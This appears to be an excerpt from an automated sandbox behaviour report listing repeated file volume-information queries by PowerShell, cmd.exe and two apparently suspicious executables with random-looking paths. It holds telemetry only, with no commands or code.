Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Queries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformation
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Queries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformation
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Queries volume information: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe VolumeInformation
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
